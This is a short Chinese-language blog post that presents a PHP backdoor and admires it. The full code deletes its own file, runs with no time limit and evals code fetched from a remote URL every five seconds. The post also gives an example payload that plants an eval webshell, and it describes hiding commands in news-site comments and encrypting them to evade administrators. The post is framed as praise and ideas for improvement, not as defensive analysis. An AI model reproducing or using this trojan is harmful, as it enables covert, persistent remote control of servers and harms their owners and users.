1. 程式人生 > >撿了一個非常淫蕩的PHP後門,給跪了

撿了一個非常淫蕩的PHP後門,給跪了

<?php

unlink($_SERVER['SCRIPT_FILENAME']);

ignore_user_abort(true);

set_time_limit(0);

$remote_file = 'http://xxx/xxx.txt';

while($code = file_get_contents($remote_file)){

@eval($code);

sleep(5);

};

?>

後門的程式碼第一行刪除自身,然後駐留在後臺記憶體裡(關於ignore_user_abort函式,百度一下),等待外部連結
在xxx.txt中寫入你的後門程式碼,訪問後就會刪除自己並迴圈執行txt的程式碼 

例如txt裡面寫了一句這樣的程式碼 file_put_contents('./1.php',"<?php @eval($_POST[cmd])'"?>");
這樣就會在目錄下又生成一個木馬


如果對方寫了是執行命令 。。。

這段程式碼純粹變成了一個等待命令的木馬。。


而且管理員檢查木馬檔案的時候  都找不到。。。


因為檔案已經刪除了

木馬卻注入在php-fpm內
sleep(5);  五秒就去遠端讀取一下指令。。。........打算將程式碼修改一下,加一些正則,去163某一篇新聞的評論裡讀取預先設定的惡意程式碼。。。hehe。。。


黑客連伺服器都省了。。。

黑客只需要去網易新聞評論視窗內寫入自己的程式碼就行

怕別人看懂?直接加密

採用對稱加密演算法。。沒有祕鑰 誰也看不懂啥意思


祕鑰在這段後門裡面寫著


所以非常安全

活生生就是一個遠控木馬啊!!

這麼好的思路,給作者一個大讚